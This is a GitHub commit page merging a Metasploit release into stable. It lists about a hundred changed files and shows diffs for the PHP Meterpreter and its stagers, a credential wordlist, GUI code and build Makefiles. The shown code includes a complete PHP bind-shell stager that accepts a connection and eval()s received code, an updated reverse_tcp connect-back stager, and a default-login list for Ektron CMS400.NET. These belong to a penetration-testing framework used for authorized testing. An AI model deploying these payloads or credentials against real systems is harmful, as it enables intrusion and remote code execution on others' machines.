Permalink
Browse files

Merge branch 'release/20120131000001' into stable

  • Loading branch information...
Jenkins
Jenkins committed Feb 13, 2012
2 parents 060115e + 77a9b36 commit d70596ab44a81652ac4ad92d052f0fbdf6f4ff1d
Showing with 2,603 additions and 585 deletions.
  1. BIN data/gui/msfgui.jar
  2. BIN data/meterpreter/ext_server_networkpug.lso
  3. BIN data/meterpreter/ext_server_sniffer.lso
  4. BIN data/meterpreter/ext_server_stdapi.lso
  5. +17 −9 data/meterpreter/meterpreter.php
  6. BIN data/meterpreter/msflinker_linux_x86.bin
  7. +53 −0 data/php/bind_tcp_ipv6.php
  8. +4 −1 data/php/reverse_tcp.php
  9. +32 −10 data/post/enum_artifacts_list.txt
  10. +9 −0 data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb
  11. +14 −0 data/wordlists/cms400net_default_userpass.txt
  12. +12 −0 external/source/gui/msfguijava/src/msfgui/PayloadPopup.java
  13. +3 −3 external/source/gui/msfguijava/src/msfgui/RpcConnection.java
  14. +29 −6 external/source/meterpreter/Makefile
  15. +5 −1 external/source/meterpreter/source/bionic/libc/Android.mk
  16. +1 −1 external/source/meterpreter/source/bionic/libc/Jamfile
  17. +2 −2 external/source/meterpreter/source/bionic/libc/out/x86/make.sh
  18. +1 −1 external/source/meterpreter/source/bionic/libdl/Makefile
  19. +1 −0 external/source/meterpreter/source/bionic/libm/msfMakefile
  20. +2 −2 external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
  21. +2 −2 external/source/meterpreter/source/extensions/stdapi/server/fs/file.c
  22. +29 −0 external/source/meterpreter/source/extensions/stdapi/server/fs/fs.h
  23. +29 −1 external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
  24. +28 −9 external/source/meterpreter/source/openssl/build.sh
  25. +6 −5 external/source/meterpreter/source/server/rtld/Makefile
  26. +2 −2 external/source/meterpreter/source/server/rtld/elf2bin.c
  27. +4 −4 external/source/meterpreter/source/server/rtld/linker_debug.h
  28. +1 −1 external/source/meterpreter/workspace/Makefile
  29. +1 −1 external/source/meterpreter/workspace/common/Makefile
  30. +1 −1 external/source/meterpreter/workspace/ext_posix_sample/Makefile
  31. +1 −1 external/source/meterpreter/workspace/ext_server_networkpug/Makefile
  32. +1 −1 external/source/meterpreter/workspace/ext_server_sniffer/Makefile
  33. +1 −1 external/source/meterpreter/workspace/ext_server_stdapi/Makefile
  34. +1 −1 external/source/meterpreter/workspace/metsrv/Makefile
  35. +1 −1 lib/msf/core/auxiliary/report.rb
  36. +1 −0 lib/msf/core/db.rb
  37. +2 −1 lib/msf/core/exploit/http/client.rb
  38. +10 −2 lib/msf/core/exploit/http/server.rb
  39. +12 −1 lib/msf/core/exploit/postgres.rb
  40. +4 −0 lib/msf/core/model/host.rb
  41. +12 −0 lib/msf/core/post/common.rb
  42. +16 −4 lib/msf/core/post/file.rb
  43. +5 −0 lib/msf/core/rpc/v10/rpc_module.rb
  44. +21 −10 lib/msf/ui/console/command_dispatcher/core.rb
  45. +1 −1 lib/postgres/postgres-pr/connection.rb
  46. +1 −1 modules/auxiliary/admin/natpmp/natpmp_map.rb
  47. +8 −3 modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb
  48. +59 −54 modules/auxiliary/bnat/bnat_scan.rb
  49. +2 −2 modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
  50. +1 −1 modules/auxiliary/gather/natpmp_external_address.rb
  51. +108 −10 modules/auxiliary/scanner/discovery/udp_probe.rb
  52. +114 −8 modules/auxiliary/scanner/discovery/udp_sweep.rb
  53. +161 −0 modules/auxiliary/scanner/http/ektron_cms400net.rb
  54. +1 −1 modules/auxiliary/scanner/http/tomcat_enum.rb
  55. +1 −62 modules/auxiliary/scanner/mssql/mssql_hashdump.rb
  56. +2 −48 modules/auxiliary/scanner/mysql/mysql_hashdump.rb
  57. +1 −1 modules/auxiliary/scanner/natpmp/natpmp_portscan.rb
  58. +1 −37 modules/auxiliary/scanner/oracle/oracle_hashdump.rb
  59. +1 −1 modules/auxiliary/scanner/oracle/xdb_sid.rb
  60. +1 −1 modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
  61. +66 −0 modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb
  62. +174 −0 modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb
  63. +1 −1 modules/auxiliary/scanner/postgres/postgres_hashdump.rb
  64. +2 −2 modules/auxiliary/scanner/postgres/postgres_version.rb
  65. +1 −1 modules/auxiliary/scanner/snmp/snmp_login.rb
  66. +7 −1 modules/auxiliary/scanner/vmware/vmauthd_login.rb
  67. +94 −0 modules/auxiliary/scanner/vmware/vmware_http_login.rb
  68. +1 −1 modules/auxiliary/server/tftp.rb
  69. +13 −18 modules/auxiliary/spoof/arp/arp_poisoning.rb
  70. +1 −1 modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
  71. +100 −0 modules/exploits/multi/http/vbseo_proc_deutf.rb
  72. +1 −1 modules/exploits/osx/browser/mozilla_mchannel.rb
  73. +1 −1 modules/exploits/windows/browser/mozilla_mchannel.rb
  74. +469 −0 modules/exploits/windows/browser/ms12_004_midi.rb
  75. +1 −1 modules/exploits/windows/browser/teechart_pro.rb
  76. +3 −3 modules/exploits/windows/browser/vlc_amv.rb
  77. +74 −0 modules/exploits/windows/misc/hp_magentservice.rb
  78. +53 −0 modules/payloads/singles/osx/x64/exec.rb
  79. +61 −0 modules/payloads/singles/php/bind_perl_ipv6.rb
  80. +92 −0 modules/payloads/singles/php/bind_php_ipv6.rb
  81. +0 −1 modules/payloads/singles/php/meterpreter_reverse_tcp.rb
  82. +4 −3 modules/payloads/singles/php/reverse_perl.rb
  83. +13 −5 modules/payloads/singles/php/reverse_php.rb
  84. +54 −0 modules/payloads/stagers/php/bind_tcp_ipv6.rb
  85. +2 −3 modules/post/linux/gather/checkvm.rb
  86. +64 −0 modules/post/multi/gather/enum_vbox.rb
  87. +138 −0 modules/post/multi/gather/find_vmx.rb
  88. +11 −2 modules/post/multi/gather/pidgin_cred.rb
  89. +36 −18 modules/post/windows/gather/checkvm.rb
  90. +1 −1 modules/post/windows/gather/credentials/filezilla_server.rb
  91. +2 −2 modules/post/windows/gather/credentials/imail.rb
  92. +1 −1 modules/post/windows/gather/credentials/imvu.rb
  93. +1 −1 modules/post/windows/gather/credentials/nimbuzz.rb
  94. +3 −2 modules/post/windows/gather/dumplinks.rb
  95. +45 −41 modules/post/windows/gather/enum_artifacts.rb
  96. +2 −2 modules/post/windows/gather/enum_devices.rb
  97. +3 −0 msfvenom
  98. +12 −12 tools/msftidy.rb
  99. +157 −144 tools/reg.rb
View
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -730,6 +730,17 @@ function register_stream($stream, $ipaddr=null, $port=null) {
function connect($ipaddr, $port, $proto='tcp') {
my_print("Doing connect($ipaddr, $port)");
$sock = false;
+
+ # IPv6 requires brackets around the address in some cases, but not all.
+ # Keep track of the un-bracketed address for the functions that don't like
+ # brackets, specifically socket_connect and socket_sendto.
+ $ipf = AF_INET;
+ $raw_ip = $ipaddr;
+ if (FALSE !== strpos($ipaddr, ":")) {
+ $ipf = AF_INET6;
+ $ipaddr = "[". $raw_ip ."]";
+ }
+
# Prefer the stream versions so we don't have to use both select functions
# unnecessarily, but fall back to socket_create if they aren't available.
if (is_callable('stream_socket_client')) {
@@ -759,16 +770,17 @@ function connect($ipaddr, $port, $proto='tcp') {
if (!$sock) { return false; }
register_stream($sock, $ipaddr, $port);
}
- } elseif (is_callable('socket_create')) {
+ } else
+ if (is_callable('socket_create')) {
my_print("socket_create");
if ($proto == 'tcp') {
- $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
- $res = socket_connect($sock, $ipaddr, $port);
+ $sock = socket_create($ipf, SOCK_STREAM, SOL_TCP);
+ $res = socket_connect($sock, $raw_ip, $port);
if (!$res) { return false; }
register_socket($sock);
} elseif ($proto == 'udp') {
- $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
- register_socket($sock, $ipaddr, $port);
+ $sock = socket_create($ipf, SOCK_DGRAM, SOL_UDP);
+ register_socket($sock, $raw_ip, $port);
}
}
@@ -1066,10 +1078,6 @@ function remove_reader($resource) {
$ipaddr = '127.0.0.1';
$port = 4444;
my_print("Don't have a msgsock, trying to connect($ipaddr, $port)");
- if (FALSE !== strpos($ipaddr,":")) {
- # ipv6 requires brackets around the address
- $ipaddr = "[".$ipaddr."]";
- }
$msgsock = connect($ipaddr, $port);
if (!$msgsock) { die(); }
} else {
Binary file not shown.
View
@@ -0,0 +1,53 @@
+#<?php
+
+# The payload handler overwrites this with the correct LPORT before sending
+# it to the victim.
+$port = 4444;
+$ipaddr = "::";
+
+if (is_callable('stream_socket_server')) {
+ $srvsock = stream_socket_server("tcp://[{$ipaddr}]:{$port}");
+ if (!$srvsock) { die(); }
+ $s = stream_socket_accept($srvsock, -1);
+ $s_type = 'stream';
+} elseif (is_callable('socket_create_listen')) {
+ $srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP);
+ if (!$res) { die(); }
+ $s = socket_accept($srvsock);
+ $s_type = 'socket';
+} elseif (is_callable('socket_create')) {
+ $srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP);
+ $res = socket_bind($srvsock, $ipaddr, $port);
+ if (!$res) { die(); }
+ $s = socket_accept($srvsock);
+ $s_type = 'socket';
+} else {
+ die();
+}
+if (!$s) { die(); }
+
+switch ($s_type) {
+case 'stream': $len = fread($s, 4); break;
+case 'socket': $len = socket_read($s, 4); break;
+}
+if (!$len) {
+ # We failed on the main socket. There's no way to continue, so
+ # bail
+ die();
+}
+$a = unpack("Nlen", $len);
+$len = $a['len'];
+
+$b = '';
+while (strlen($b) < $len) {
+ switch ($s_type) {
+ case 'stream': $b .= fread($s, $len-strlen($b)); break;
+ case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
+ }
+}
+
+# Set up the socket for the main stage to use.
+$GLOBALS['msgsock'] = $s;
+$GLOBALS['msgsock_type'] = $s_type;
+eval($b);
+die();
View
@@ -5,9 +5,12 @@
# it to the victim.
$ip = '127.0.0.1';
$port = 4444;
+$ipf = AF_INET;
+
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
+ $ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
@@ -17,7 +20,7 @@
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
- $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
+ $s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
@@ -1,14 +1,36 @@
-# This file contains a list of artifacts used by the enum_artifacts post module
-# Artifacts should be listed one per line and use the following formats:
-# File entries
-# file|path/to/file|md5sum
+# YAML:1.0
+# Configuration file for enum_artifacts.rb module
+# This file contains a YAML formated list of artifacts used by the
+# enum_artifacts post module. Artifacts should be listed using the following
+# format:
#
-# Registry entries
-# reg|hive|key|value
+# ---
+# malware_name:
+# files:
+# - name: path\to\file
+# csum: 00112233445566778899aabbccddeeff
+# - name: path\to\another\file
+# csum: 112233445566778899aabbccddeeff00
+#
+# reg_entries:
+# - key: registry_key
+# val: registry_value
+# data: data
#
# Happy hunting
+---
+test_evidence:
+ files:
+ - name: c:\ntdetect.comx
+ csum: b2de3452de03674c6cec68b8c8ce7c78
+ - name: c:\boot.ini
+ csum: fa579938b0733b87066546afe951082c
+
+ reg_entries:
+ - key: HKEY_LOCAL_MACHINE\SYSTEM\Selectx
+ val: Current
+ data: 1
+ - key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI
+ val: DisplayName
+ data: Microsoft ACPI Driver
-file|c:\ntdetect.com|b2de3452de03674c6cec68b8c8ce7c78
-file|c:\boot.ini|fa579938b0733b87066546afe951082c
-reg|HKEY_LOCAL_MACHINE\SYSTEM\Select|Current|1
-reg|HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI|DisplayName|Microsoft ACPI Driver
@@ -0,0 +1,9 @@
+class AddVirtualHostToHosts < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :virtual_host, :text
+ end
+
+ def self.down
+ remove_column :hosts, :viritual_host
+ end
+end
@@ -0,0 +1,14 @@
+admin admin
+builtin builtin
+jedit jedit
+jmember jmember
+Admin2 Admin2
+tbrown tbrown
+jsmith jsmith
+vs vs
+EkExplorerUser EkExplorerUser
+Explorer Explorer
+member@example.com member@example.com
+north north
+supermember supermember
+west west
@@ -46,6 +46,18 @@ public PayloadPopup(String fullName, RpcConnection rpcConn, MainFrame frame) {
encoderCombo.setSelectedIndex(defaultEncoder);
}catch(MsfException xre){
}
+ //get formats
+ try{
+ Object[] formats = ((List)rpcConn.execute("module.encode_formats")).toArray();
+ int defaultFormat = 0;
+ for(int i = 0; i < formats.length; i++)
+ if(formats[i].toString().equals("exe"))
+ defaultFormat = i;
+ outputCombo.setModel(new DefaultComboBoxModel(formats));
+ outputCombo.setSelectedIndex(defaultFormat);
+ }catch(MsfException xre){
+ xre.printStackTrace();
+ }
mainScrollPane.getVerticalScrollBar().setUnitIncrement(40);
}
@@ -84,7 +84,7 @@ public void setup(String username, char[] password, String host, int port, boole
String message = "";
try {
connect();
- Map results = exec("auth.login",new Object[]{username, this.password});
+ Map results = (Map)exec("auth.login",new Object[]{username, this.password});
rpcToken=results.get("token").toString();
haveRpcd=results.get("result").equals("success");
} catch (MsfException xre) {
@@ -211,11 +211,11 @@ private Object cacheExecute(String methodName, Object[] params) throws MsfExcept
}
/** Method that handles synchronization and error handling for calls */
- private Map exec (String methname, Object[] params) throws MsfException{
+ private Object exec (String methname, Object[] params) throws MsfException{
synchronized(lockObject){ //Only one method call at a time!
try{
writeCall(methname, params);
- return (Map)readResp();
+ return readResp();
}catch(Exception ex){ //any weirdness gets wrapped in a MsfException
try{
if(ex instanceof java.net.SocketTimeoutException)
@@ -40,11 +40,25 @@ external/source/meterpreter/source/bionic/compiled/libcrypto.so: tmp/openssl-0.9
external/source/meterpreter/source/bionic/compiled/libssl.so: tmp/openssl-0.9.8o/libssl.so
cp tmp/openssl-0.9.8o/libssl.so external/source/meterpreter/source/bionic/compiled/libssl.so
+LIBC=$(PWD)/external/source/meterpreter/source/bionic/libc
+LIBM=$(PWD)/external/source/meterpreter/source/bionic/libm
+COMPILED=$(PWD)/external/source/meterpreter/source/bionic/compiled
+MSF_CFLAGS=-Os -Wl,--hash-style=sysv -march=i386 -m32 -nostdinc -nostdlib -fno-builtin -fpic -I $(LIBC)/include -I $(LIBC)/kernel/common/linux/ -I $(LIBC)/kernel/common/ -I $(LIBC)/arch-x86/include/ -I $(LIBC)/kernel/arch-x86/ -I$(LIBC)/private -I$(LIBM)/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L$(COMPILED) -lc
+
tmp/openssl-0.9.8o/libssl.so:
[ -d tmp ] || mkdir tmp
- [ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz && tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
- (cd tmp/openssl-0.9.8o && ./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-elf shared)
- (cd tmp/openssl-0.9.8o && make CC="gcc -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
+ [ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz
+ [ -f tmp/openssl-0.9.8o/Configure ] || tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
+ (cd tmp/openssl-0.9.8o && \
+ cat Configure | grep -v 'linux-msf' | \
+ sed -e 's#my %table=(#my %table=( \
+ "linux-msf", "gcc:$(MSF_CFLAGS) -DL_ENDIAN -DTERMIO -Wall::$(MSF_CFLAGS) -D_REENTRANT::$(MSF_CFLAGS) -ldl:BN_LLONG $${x86_gcc_des} $${x86_gcc_opts}:$${x86_elf_asm}:dlfcn:linux-shared:$(MSF_CFLAGS) -fPIC::.so.\\$$\\$$(SHLIB_MAJOR).\\$$\\$$(SHLIB_MINOR)",\
+ #;' > Configure-msf;\
+ cp Configure-msf Configure && chmod +x Configure && \
+ grep linux-msf Configure && \
+ ./Configure --prefix=/tmp/out threads shared no-hw no-dlfcn no-zlib no-krb5 no-idea 386 linux-msf \
+ )
+ (cd tmp/openssl-0.9.8o && make CC="gcc -march=i386 -m32 -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
cp tmp/openssl-0.9.8o/libssl.so* tmp/openssl-0.9.8o/libcrypto.so* external/source/meterpreter/source/openssl/lib/linux/i386/
external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1/libpcap.so.1.1.1
@@ -53,7 +67,7 @@ external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1
tmp/libpcap-1.1.1/libpcap.so.1.1.1:
[ -d tmp ] || mkdir tmp
[ -f tmp/libpcap-1.1.1.tar.gz ] || wget -O tmp/libpcap-1.1.1.tar.gz http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
- tar -C tmp -xzf tmp/libpcap-1.1.1.tar.gz
+ [ -f tmp/libpcap-1.1.1/configure ] || tar -C tmp -xzf tmp/libpcap-1.1.1.tar.gz
(cd tmp/libpcap-1.1.1 && ./configure --disable-bluetooth --without-bluetooth --without-usb --disable-usb --without-can --disable-can --without-usb-linux --disable-usb-linux)
echo '#undef HAVE_DECL_ETHER_HOSTTON' >> tmp/libpcap-1.1.1/config.h
echo '#undef HAVE_SYS_BITYPES_H' >> tmp/libpcap-1.1.1/config.h
@@ -63,7 +77,7 @@ tmp/libpcap-1.1.1/libpcap.so.1.1.1:
echo '#define _STDLIB_H this_works_around_malloc_definition_in_grammar_dot_c' >> tmp/libpcap-1.1.1/config.h
(cd tmp/libpcap-1.1.1 && patch --dry-run -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff && patch -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff)
sed -i -e s/pcap-usb-linux.c//g -e s/fad-getad.c/fad-gifc.c/g tmp/libpcap-1.1.1/Makefile
- sed -i -e s^"CC = gcc"^"CC = gcc -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
+ sed -i -e s^"CC = gcc"^"CC = gcc -march=i386 -m32 -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
(cd tmp/libpcap-1.1.1 && make)
@@ -108,10 +122,19 @@ data/meterpreter/ext_server_networkpug.lso: $(workspace)/ext_server_networkpug/e
clean:
rm -f $(objects)
rm -f external/source/meterpreter/source/bionic/lib*/*.o
+ find external/source/meterpreter/source/bionic/ -name '*.a' -print0 | xargs -0 rm -f 2>/dev/null
rm -f external/source/meterpreter/source/bionic/lib*/*.so
(cd external/source/meterpreter/source/server/rtld/ && make clean)
(cd $(workspace) && make clean)
+clean-pcap:
+ (cd tmp/libpcap-1.1.1/ && make clean)
+
+clean-ssl:
+ (cd tmp/openssl-0.9.8o/ && make clean)
+
+really-clean: clean clean-ssl clean-pcap
+
-.PHONY: clean
+.PHONY: clean clean-ssl clean-pcap really-clean
@@ -443,7 +443,11 @@ else # !arm
# Enable recent IA friendly memory routines (such as for Atom)
# These will not work on the earlier x86 machines
- libc_common_cflags += -mtune=i686 -DUSE_SSSE3 -DUSE_SSE2
+ #libc_common_cflags += -mtune=i686 -DUSE_SSSE3 -DUSE_SSE2
+
+ # egypt: compile for 386 so meterpreter will have a chance of working on
+ # older processors
+ libc_common_cflags += -march=i386
endif # x86
endif # !arm
@@ -377,7 +377,7 @@ DEFINES = USE_LOCKS
ANDROID
;
-CFLAGS_x86 = -Iprivate -Ibionic -Ikernel/arch-x86 -Ikernel/common -I../libm/include -fno-stack-protector -fno-pie -DPIC -ffreestanding -fno-tree-scev-cprop ;
+CFLAGS_x86 = -m32 -march=i386 -Iprivate -Ibionic -Ikernel/arch-x86 -Ikernel/common -I../libm/include -fno-stack-protector -fno-pie -DPIC -ffreestanding -fno-tree-scev-cprop ;
for arch in $(ARCH)
@@ -11,10 +11,10 @@ for i in $BAD_FILES ; do
rm flood/$i >/dev/null
done
-gcc -Wl,--hash-style=sysv -nostdinc -nostdlib -shared -o libbionic.so flood/*.o -lgcc
+gcc -Wl,--hash-style=sysv -nostdinc -nostdlib -shared -o libbionic.so flood/*.o -lgcc -march=i386 -m32
[ ! -f libc.so ] && ln -s ${PWD}/libbionic.so libc.so
rm -rf flood >/dev/null
-
+exit 0
@@ -3,7 +3,7 @@ CFLAGS+= -I../libc/include -I../libc/private -I../libc/bionic -I../libc/kernel/a
CFLAGS+= -I../libc/kernel/common/linux/ -I../libc/arch-x86/include/ -I../libc/kernel/common/
CFLAGS+= -Os
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
all:
gcc -Wl,--hash-style=sysv -shared -o libdl.so $(CFLAGS) libdl.c
@@ -10,6 +10,7 @@ CFLAGS+=-I../libc/kernel/common/ -I../libc/arch-${TARGET_ARCH}/include/ -I../lib
CFLAGS+=-D_BYTE_ORDER=_LITTLE_ENDIAN -Ihack/ -I${TARGET_FPU} -I../libc/arch-${TARGET_ARCH}/include
CFLAGS+=-fPIC -DPIC
CFLAGS+=-Wl,--hash-style=sysv
+CFLAGS+=-march=i386 -m32
libm_common_src_files= \
isinf.c \
@@ -21,7 +21,7 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
LPSTR expanded = NULL, tempFile = NULL;
DWORD tempFileSize = 0;
LPSTR baseDirectory = NULL;
- struct stat buf;
+ struct meterp_stat buf;
directory = packet_get_tlv_value_string(packet, TLV_TYPE_DIRECTORY_PATH);
@@ -150,7 +150,7 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
tempFile);
// Stat the file to get more information about it.
- if (stat(tempFile, &buf) >= 0)
+ if (fs_stat(tempFile, &buf) >= 0)
packet_add_tlv_raw(response, TLV_TYPE_STAT_BUF, &buf,
sizeof(buf));
@@ -257,7 +257,7 @@ DWORD request_fs_separator(Remote *remote, Packet *packet)
DWORD request_fs_stat(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
- struct stat buf;
+ struct meterp_stat buf;
LPCSTR filePath;
LPSTR expanded = NULL;
DWORD result = ERROR_SUCCESS;
@@ -273,7 +273,7 @@ DWORD request_fs_stat(Remote *remote, Packet *packet)
{
// Stat the file using the Microsoft stat wrapper so that we don't have to
// do translations
- if (stat(expanded, &buf) < 0)
+ if (fs_stat(expanded, &buf) < 0)
result = GetLastError();
else
packet_add_tlv_raw(response, TLV_TYPE_STAT_BUF, &buf,
Oops, something went wrong.

0 comments on commit d70596a

Please sign in to comment.